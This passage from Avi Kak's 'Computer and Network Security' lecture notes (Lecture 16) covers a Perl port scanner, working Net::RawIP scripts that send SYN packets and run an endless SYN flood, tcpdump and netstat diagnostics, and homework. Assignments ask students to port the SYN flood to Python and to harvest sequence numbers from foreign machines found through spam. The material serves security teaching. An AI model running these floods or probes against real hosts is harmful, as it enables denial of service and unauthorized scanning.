# Now find out what services are provided by the open ports. CAUTION: # This information is useful only when you are sure that the target # machine has used the designated ports for the various services. # That is not always the case for intra-networkds: open OUT, ">openports.txt" or die "Unable to open openports.txt: $!"; #(32) if (!@open_ports) { #(33) print "\n\nNo open ports in the range specified\n"; #(34) } else { #(35) print "\n\nThe open ports:\n\n"; #(36) foreach my $k (0..$#open_ports) { #(37) if (-s "/etc/services" ) { #(38) foreach my $portname ( sort keys %service_ports ) { #(39) if ($portname =~ /^$open_ports[$k]\//) { #(40) print "$open_ports[$k]: $service_ports{$portname}\n"; } #(41) } } else { #(42) print $open_ports[$k], "\n"; #(43) } print OUT $open_ports[$k], "\n"; #(44) } } close OUT; #(45) print "\n";

Now that you have gured out what ports are open at the target machine, choose one for mounting a SYN ood attack. But before you actually create a SYN ood, you may wish to send a controlled number of SYN packets to a target machine and examine what happens to those packets at least at your end and, if possibe, at both ends, with a packet snier like tcpdump. Here is an example of a Perl script that uses the Net::RawIP module for creating and manipulating raw packets:
70

Computer and Network Security by Avi Kak

Lecture 16

#!/usr/bin/perl ### DoS4.pl ### by Avi Kak use strict; use Net::RawIP; die "usage syntax>> DoS4.pl source_IP source_port " . "dest_IP dest_port how_many_packets $!\n" unless @ARGV == 5;

my ($srcIP, $srcPort, $destIP, $destPort, $count) = @ARGV; my $packet = new Net::RawIP; $packet->set({ip => {saddr => $srcIP, daddr => $destIP}, tcp => {source => $srcPort, dest => $destPort, syn => 1, seq => 111222}}); for (1..$count) { $packet->send; }

If, as root, you call the above script with a command line like
DoS4.pl 192.168.1.102 46345 128.46.144.10 80 1

it will send exactly one packet to the destination IP address 128.46.144.10 at its port 80. You can send as many packets as you want by simply changing the last argument to whatever you wish. [You will have to do this as root since you are constructing a raw socket.] Before you invoke the above script, re up the tcpdump packet snier in another window:
tcpdump -vvv -nn -i eth0 src or dst 192.168.1.102
71

-s 1500 -S -X

Computer and Network Security by Avi Kak

Lecture 16

If this does not eliminate the packet clutter unrelated to the packets you are sending out, try the following version which mentions explicitly the port specied in the Perl script:
tcpdump -vvv -nn -i eth0 src or dst 192.168.1.102 and port 46345 -s 1500 -S -X

See the explanations in Section 16.8 for what the various options to tcpdump mean. When you examine the packets captured by tcpdump, you will notice that every new connection attempted by every SYN packet gets reset in the third part of the 3-way handshake.

Shown below are the rst three packets exchanged between the source machine and the destination machine. In the display produced by tcpdump, the token DF means Dont Fragment, the token S means a SYN packet, the token ack an acknowledgement packet, the token R a reset packet, etc. The number 6 you see is the integer that represents the TCP protocol. You can see that the rst outgoing packet is a SYN packet and its sequence number is as set in the script. The second packet is a SYN+ACK packet. Note its sequence number and its acknowledgement number. The third packet is an automatically generated RST packet by the machine on which the script DoS4.pl is run this will reset the connection with the targeted machine. What that implies is that the TCP engine at the targeted machine will NOT get stuck in the 75 sec connection establishment timer.
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1500 bytes 72

Computer and Network Security by Avi Kak

Lecture 16

18:13:52.713104 IP (tos 0x10, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40) 192.168.1.102.46345 > 128.46.144.10.80: S, cksum 0x75ca (correct), 111222:111222(0) win 65535 18:13:52.753774 IP (tos 0x0, ttl 51, id 63986, offset 0, flags [DF], proto TCP (6), length 44) 128.46.144.10.80 > 192.168.1.102.46345: S, cksum 0x26be (correct), 2166879606:2166879606(0) ack 111223 win 49312 <mss 1460> 18:13:52.753854 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40) 192.168.1.102.46345 > 128.46.144.10.80: R, cksum 0x75c7 (correct), 111223:111223(0) win 0 .... ....

The following version of the previous script can be used for mounting a SYN ood. Use a packet snier, such as tcpdump, to see the outgoing packets at your end. If you spoofed the source IP address, you will not see the SYN+ACK packets coming back from the target machine. So to really determine whether or not you successfully mounted a DoS attack, youd need some sort of access to the target machine. Call this script with a command-line like
DoS5.pl 192.168.1.102 46345 128.46.144.123 22

If you have access to the target machine and you want to see both the SYN ood packets, any return packets, and the ICMP packets at the target machine, you can use the following options for tcpdump:
tcpdump -vvv -nn -i eth0 -s 1500 -S -X src or dst xxx.xxx.xxx.xxx or icmp

where xxx.xxx.xxx.xxx is the IP address from where the SYN ood is originating.

#!/usr/bin/perl

73

Computer and Network Security by Avi Kak

Lecture 16

### DoS5.pl ### by Avi Kak # # # This script is for creating a SYN flood on a designated port. But you must make sure that the port is open. Use my port_scan.pl to figure out if a port is open.

use strict; use Net::RawIP; die "usage syntax>> DoS5.pl source_IP source_port " . "dest_IP dest_port how_many_packets $!\n" unless @ARGV == 4;

my ($srcIP, $srcPort, $destIP, $destPort) = @ARGV; my $packet = new Net::RawIP; $packet->set({ip => {saddr => $srcIP, daddr => $destIP}, tcp => {source => $srcPort, dest => $destPort, syn => 1, seq => 111222}}); while(1) { $packet->send; sleep(1); }

If you do not have the Perl module Net::RawIP installed for the DoS4.pl and DoS5.pl scripts to work, you may either get it from the CPAN archive, or, on a Ubuntu machine, download it as a part of the libnet-rawip-perl package through your Synaptic package manager.

74

Computer and Network Security by Avi Kak

Lecture 16

You can write similar scripts in Python using, for example, the socket and the scapy modules.

75

Computer and Network Security by Avi Kak

Lecture 16

16.15: USING THE Netstat UTILITY FOR TROUBLESHOOTING NETWORKS

If you examine the time history of a typical TCP connection, it should spend most of its time in the ESTABLISHED state. A connection may also park itself momentarily in states like FIN WAIT 2 or CLOSE WAIT. But if a connection is found to be in SYN SENT, or SYN RCVD, or FIN WAIT 1 for any length of time, something is seriously wrong.

Netstat is an extremely useful utility for printing out information concerning network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.

For example, if you want to display a list of the ongoing TCP and UDP connections and the state each connection is in, you would invoke
netstat -n | grep tcp

where the -n option causes the netstat utility to display the IP addresses in their numerical form. Just after a page being viewed in the Firefox browser was closed, the above command returned:
76

Computer and Network Security by Avi Kak

Lecture 16

tcp tcp tcp

0 0 0

0 192.168.1.100:41888 0 192.168.1.100:41873 0 192.168.1.100:41887

128.174.252.3:80 72.14.253.95:80 128.46.144.10:22

ESTABLISHED ESTABLISHED TIME_WAIT

This says that the interface 192.168.1.100 on the local host is using port 41888 in an open TCP connection with the remote host 128.174.252.3 on its port 80 and the current state of the connection is ESTABLISHED. Along the same lines, the same interface on the local machine is using port 41873 in an open connection with www.google.com (72.14.253.95 : 80) and that connection is also in state ESTABLISHED. On the other hand, the third connection shown above, on the local port 41887, is with RVL4 on its port 22; the current state of that connection is TIME WAIT. [The netstat
commands work on the Windows platforms also. Try playing with commands like netstat -an and netstat -r in the cmd window of your Windows machine.

Going back to the subject of a TCP connection spending too much time in a state other than ESTABLISHED, here are the states in which a connection may be stuck and the possible causes. Note that you may have a problem even when the local and the remote are both in ESTABLISHED and the remote server is not responding to the local client at the application level.

1. stuck in ESTABLISHED: If everything is humming along ne, then this is the right state to be in while the data is going back and forth between the local and the remote. But if the TCP state at either end is in this state while there is
77

Computer and Network Security by Avi Kak

Lecture 16

no interaction at the application level, you have a problem. That would indicate that either the server is too busy at the application level or that it is under attack.

2. stuck in SYN SENT: Possible causes: Remote hosts network connection is down; remote host is down; remote host does NOT have a route to the local host (routing table prob at remote). Other possible causes: some network link between remote and local is down; local does not have a route to remote (routing table problem at local); some network link between local and remote is down.

3. stuck in SYN RCVD: Possible causes: Local does not have a route to remote (routing table problem at local); some network link between local and remote is down; the network between local and remote is slow and noisy; the local is under DoS attack, etc.

4. stuck in FIN WAIT 1: Possible causes: Remotes network connection is down; remote is down; some network link between local and remote is down; some network link between remote and local is down; etc.

5. stuck in FIN WAIT 2: Possible cause: The application


78

Computer and Network Security by Avi Kak

Lecture 16

on remote has NOT closed the connection.

6. stuck in CLOSING: Possible causes: Remotes network connection is down; remote is down; some network link between local and remote is down; some network link between remote and local is down; etc.

7. stuck in CLOSE WAIT: Possible cause: The application on local has NOT closed the connection.

In what follows, we will examine some of the causes listed above for a TCP engine to get stuck in one of its states and see how one might diagnose the cause. But rst we will make sure that the local hosts network connection is up by testing for the following:

For hard-wired connections (as with an ethernet cable), you can check the link light indicators at both ends of a cable. By pinging another host on the local network. By looking at the ethernet packet statistics for the network interface card. The ethernet stats should show an increasing number of bytes on an interface that is up and running. You can invoke
79

Computer and Network Security by Avi Kak

Lecture 16

netstat -ni netstat -e

(on Linux) (on Windows)

to see the number of bytes received and sent. By invoking this command in succession, you can see if the number bytes is increasing or not.

Cause 1: Lets now examine the cause Local has no route to remote. This can cause TCP to get stuck in the following states: SYN SENT and SYN RCVD. Without a route, the local host will not know where to send the packet for forwarding to the remote. To diagnose this cause, try the command netstat -nr which displays the routing table at the local host. For example, on my laptop, this command returns
Kernel IP routing table Destination Gateway 192.168.1.0 0.0.0.0 169.254.0.0 0.0.0.0 0.0.0.0 192.168.1.1 Genmask 255.255.255.0 255.255.0.0 0.0.0.0 Flags U U UG MSS 0 0 0 Window 0 0 0 irtt 0 0 0 Iface wlan0 lo wlan0

If the UG ag is not shown for the gateway host, then something is wrong with the routing table. The letter U under ags stands for Up, implying that the network 192.168.1.0 is up and running. The letter G stands for the gateway. So the last row says that for all outbound destination addresses (since the rst column entry is 0.0.0.0), the host 192.168.1.1 is the gateway (in this case a Linksys router) and it is up. [With regard to the IP addresses shown,
note that a local network called a subnetwork or subnet is dened
80

Computer and Network Security by Avi Kak

Lecture 16

by its network address, which is the common stem of the IP addresses of all the machines connected to the same router. An IP address consists of two parts, the network part and the host part. The separation of an IP address into the two is carried out by taking a bitwise and of the IP address and the subnet mask. For a home network, the subnet mask is likely to be 255.255.255.0. So for the routing table shown, 192.168.1 (which is the same as 192.168.1.0) is the network address. By running the command shown above at Purdue with your laptop connected to Purdues wireless network, you can see that the mask used for Purdues wireless network is 255.255.240.0. Now try to gure out the network part of the IP address assigned to your laptop and the host part. Also, what do you think is the IP address of the gateway machine used by Purdues wireless network?]

The above routing table says in its last row that for ALL destination IP addresses (except those listed in the previous rows), the IP address of the gateway machine is 192.168.1.1. That, as mentioned above, is the address of the Linksys router to which the machine is connected. Although, in general, 0.0.0.0 stands for any IP address, placing this default string in the Gateway column for the network address 192.168.1.0 in the rst row means that all IP addresses of the form 192.168.1.XXX will be resolved in the local subnet itself.

Now try pinging the router IP address listed in the router table.
81

Computer and Network Security by Avi Kak

Lecture 16

If the router does not respond, then the router is down.

Cause 2: Now lets try to diagnose the cause Local to Remote Link is Down. Recall that this cause is responsible for TCP to get stuck in the FIN WAIT 1 and CLOSING states. Diagnosing this cause is tricky. After all, how do you distinguish between this cause and other causes such as the remote being down, a routing problem at the remote, or the link between remote and local being down?

The best way to deal with this situation is to have someone with direct access to the remote make sure that the remote is up and running, that its network connection is okay, and that it has a route to the local. Now we ask the person with access to the remote to execute netstat -s at the remote BEFORE and AFTER we have sent several pings from the local to the remote. The above command prints all the packet stats for dierent kinds of packets, that is for IP packets, for ICMP packets produced by ping, for TCP segments, for UDP packets, etc. So by examining the stats put out by the above command at the remote we can tell whether the link from the local to the remote is up.

82

Computer and Network Security by Avi Kak

Lecture 16

But note that pings produce ICMP packets and that rewalls and routers are sometimes congured to lter out these packets. So the above approach will not work in such situations. As an alternative, one could try to use the traceroute utility at the local machine:
traceroute ip_to_remote tracert ip_to_remote (on unix like systems) (on Windows machines)

to establish the fact there exists a link from the local to the remote. The output from these commands may also help establish whether the local-to-remote route being taken is a good route. Executing these commands at home showed that it takes ELEVEN HOPS from my house to RVL4 at Purdue:
192.168.1.1 (148 Creighton Road) -> 74.140.60.1 (a DHCP server at insightbb.com) -> 74.132.0.145 (another DHCP server at insightbb.com) -> 74.132.0.77 (another DHCP server at insightbb.com) -> 74.128.8.201 (some insightbb router, probably in Chicago) -> 4.79.74.17 (some Chicago area Level3.net router) -> 4.68.101.72 (another Chicago area Level3.net router) -> 144.232.8.113 (SprintLink router in Chicago) -> 144.232.20.2 (another SprintLink router in Chicago) -> 144.232.26.70 (another SprintLink router in Chicago) -> 144.228.154.166 (where?? probably Sprints Purdue drop) -> 128.46.144.10 (RVL4.ecn.purdue.edu)

Cause 3: This is about Remote or its network connection is down. This can lead the locals TCP to get stuck in one of the following states: SYN SENT, FIN WAIT 1, CLOSING.
83

Computer and Network Security by Avi Kak

Lecture 16

Methods to diagnose this cause are similar to those already discussed.

Cause 4: This is about the cause No route from Remote to Local. This can result in locals TCP to get stuck in the following states: SYN SENT, FIN WAIT 1, CLOSING. Same as previously for diagnosing this cause.

Cause 5: This is about the cause Remote server is too busy. This can lead to the local being stuck in the SYN SENT state and the remote being stuck in either SYN RCVD or ESTABLISHED state as explained below.

When the remote server receives a connection request from the local client, the remote will check its backlog queue. If the queue is not full, it will respond with a SYN+ACK packet. Under normal circumstances, the local will reply with a ACK packet. Upon receiving the ACK acknowledgment from the local, the remote will transition into the ESTABLISHED state and notify the server application that a new connection request has come in. However, the request stays in a queue until the server application can accept it. The only way to diagnose this problem is to use the system tools at the remote to gure out how the CPU cycles are getting apportioned on that machine.
84

Computer and Network Security by Avi Kak

Lecture 16

Cause 6: This is about the cause the local is under Denial of Service Attack. See my previous explanation of the SYN ood attack. The main symptom of this cause is that the local will get bogged down and will get stuck in the SYN RCVD state for the incoming connection requests.

Whether or not the local is under DoS attack can be checked by executing netstat -n When a machine is under DoS attack, the output will show a large number of incoming TCP connections all in the SYN RCVD state. By looking at the origination IP addresses, you can get some sense of whether this attack is underway. You can check whether those addresses are legitimate and, when legitimate, whether your machine should be receiving connection requests from those addresses.

Finally, the following invocations of netstat netstat -tap | grep LISTEN netstat -uap will show all of the servers that are up and running on your Linux machine.
85

Computer and Network Security by Avi Kak

Lecture 16

16.16: HOMEWORK PROBLEMS

1. Shown below is the tcpdump output for the rst packet a SYN packet sent by my laptop to a Purdue server for initiating a new connection. Whats the relationship between the readable information that is displayed just above the hex/ascii block and what you see in the hex/ascii block? The hex/ascii block is in the last four lines of the the tcpdump output shown below. [Being only
60 bytes in length, the packet that is shown below is the entire data payload of one Ethernet frame. (As stated in Lecture 23, the maximum size of the Ethernet payload is 1500 bytes as set by the Ethernet standard.) In general, at the receiving end, a packet such as the one shown below is what you get after de-fragmentation of the data packets received from the Link Layer. In other words, the packets displayed by tcpdump are your TCP segments that could be as long as 65535 bytes. When you do NOT set the -s option in the tcpdump command, it assumes that you want all of a packet to be captured even if it is as large as 65535. One might think that the job of tcpdump should only be to show pure TCP segments, that is, segments with no IP headers. However, each packet that is output by tcpdump is as it exists at the IP layer. The tool tcpdump applies the TCP and IP protocol rules to the packet to retrieve the header information for both protocols.

14:41:02.448992 IP (tos 0x0, ttl 64, id 25896, offset 0, flags [DF], proto TCP (6), length 60) 10.184.140.37.51856 > 128.46.4.72.22: Flags [S], cksum 0x1b82 (incorrect -> 0x2c49), seq 1630133701, win 14600, options [mss 1460,sackOK,TS val 81311981 ecr 0,nop,wscale 7], length 0 0x0000: 4500 003c 6528 4000 4006 ba40 0ab8 8c25 E..<e(@.@..@...% 0x0010: 802e 0448 ca90 0016 6129 ddc5 0000 0000 ...H....a)...... 0x0020: a002 3908 1b82 0000 0204 05b4 0402 080a ..9............. 0x0030: 04d8 b8ed 0000 0000 0103 0307 ............
86

Computer and Network Security by Avi Kak

Lecture 16

2. The minimal length of an IP header is 20 bytes (that is, ve 32bit words, implying a value of 5 for the 4-bit IHL eld in the IP header) and there is no reason to use longer than the minimum for the rst SYN packet. So, with regard to the SYN packet shown in the previous question, lets examine its rst twenty bytes:
4500 003c 6528 4000 4006 ba40 0ab8 8c25 802e 0448

Can you reconcile the information contained in these bytes with the IP header as shown in Section 16.3? For example, the rst four bits as shown above evaluate to the number 4. Now think about what is stored in the rst eld of the IPv4 header and how wide that eld is. The next four bits shown above evaluate to the number 5. Going back to the IP header, think about how wide it is and what is meant to be stored in it. For an IP header that is only 20 bytes long, the last four bytes should be the destination IP address, which in our case is 128.46.4.72. Can you see this address in the last four bytes shown above? Can you see the source IP address of 10.184.140.37 in the hex digits 0ab8 8c25 ? 3. Lets now look at the rest of the hex content in the SYN packet shown in the rst question:
ca90 0016 6129 ddc5 0000 0000 a002 3908 1b82 0000 0204 05b4 0402 080a 04d8 b8ed 0000 0000 0103 0307

This should be the TCP header. Based on the information extracted by tcpdump as shown in Question 1 above, can you reconcile it with the TCP header layout presented in Section 16.4?
87

Computer and Network Security by Avi Kak

Lecture 16

A TCP header starts with its rst two bytes used for the source port and the next two bytes used for the destination port. If you are told that the hex ca90 translates into decimal 51856, can you identify the dierent TCP elds into the hex shown above? For example, which eld do you think the four-bytes of hex 0000 0000 correspond to? 4. In the hex shown in the previous question for the TCP header, can you identify the byte that has the SYN ag? 5. An importance property of the TCP protocol is that it provides both ow control and congestion control. What is ow control? What is congestion control? How des TCP provide each? 6. When the receiver TCPs buer becomes full with the received packets, how does it signal to the sender TCP to not send any further packets for a little while? What mechanism does the sender TCP use to start sending the packets again? 7. What role is played by the following two elds of the TCP Header when a client rst sends a request-for-connection packet to a server: (1) Sequence Number, (2) Acknowledgment Number. 8. What role is played by the following two elds of the TCP Header as the data is being exchanged between a client and a server over
88

Computer and Network Security by Avi Kak

Lecture 16

a previously-established connection: (1) Sequence Number, (2) Acknowledgment Number 9. Lets say one of the routers between a party A and a party B is controlled by a hostile agent. As A is sending packets to B , here is how this agent could mount a DoS attack on B : The hostile agents router could create a very large number of duplicates of each packet received from A for B and put them on the wire for What defense does B s B . [This is another form of a replay attack.] TCP/IP engine have against such a DoS attack? 10. If your goal is to cause the TCP engine at a remote machine to hang, what other attacks can you mount on the remote machine? 11. In IP spoong, an adversary X wants a remote host to believe that the incoming packets are coming from a trusted client. So to initiate a connection with the remote host, X sends it a SYN packet with the clients IP address in it. What problems can X expect to encounter? 12. How can X get a sense of the capabilities of the ISN generator at the remote host that X is trying to attack? 13. With regard to the IP Spoong attack that an adversary X may want to mount on a remote host, what is a spoong set?
89

Computer and Network Security by Avi Kak

Lecture 16

14. What is a phase space in our context and how can it be used to construct a small spoong set? 15. We are interesting in the following question: Given N numbers at the output of a random number generator, what is the probability p that at least two of the numbers will be the same? This probability can be expressed as p = N (N 1) t 2

where t is the probability of any number making its appearance in the set. What has this got to do with setting up a size for the spoong set in the IP spoong attack? 16. We are also interested in the following question: If I specify a value for the probability p, what is the smallest possible value for N for the size of a set of random numbers so that the set will contain at least two numbers that are the same? This value for N can be expressed as: N = 2 1 ln t 1p

How can this formula be used for mounting the IP spoong attack?

90

Computer and Network Security by Avi Kak

Lecture 16

Programming Assignment: Section 16.14 of this lecture included a Perl implementation of SYN ooding for mounting a Denial-of-Service attack on a target machine. Using the socket and scapy Python modules, create a Python implementation that does the same thing. You may use the port scanner port_scanner.pl shown in this lecture, or any other similar tool, to gure out the open ports at the target machine. Before actually attacking with a SYN ood, send a single SYN packet to the target machine and gure out if it is even vulnerable to SYN ooding by analyzing the packets you pick up with a packet snier like tcpdump, as shown in Section 16.14 of this lecture. 17. Programming Assignment: Use the scripts in this lecture and the tcpdump tool to harvest the ISNs (Initial Sequence Numbers) used by a remote machine. For the remote machine, try to pick an IP address that is being used in a country where the machines are more likely to be using old TCP/IP software with weak random number generators. [You can get hold of such IP addresses by analyzing your spam mail that often originates from other countries.] You can harvest the ISNs by asking tcpdump to write the packets out to a le and analyzing the content of that le with a script you would need to write. Now, in accordance with the discussion in Section 16.13, construct a phase space for the ISNs you have thus harvested. Display the phase space with a 3D plot in order to determine how vulnerable the remote machine is
91

Computer and Network Security by Avi Kak

Lecture 16

to IP spoong attacks.

92

You might also like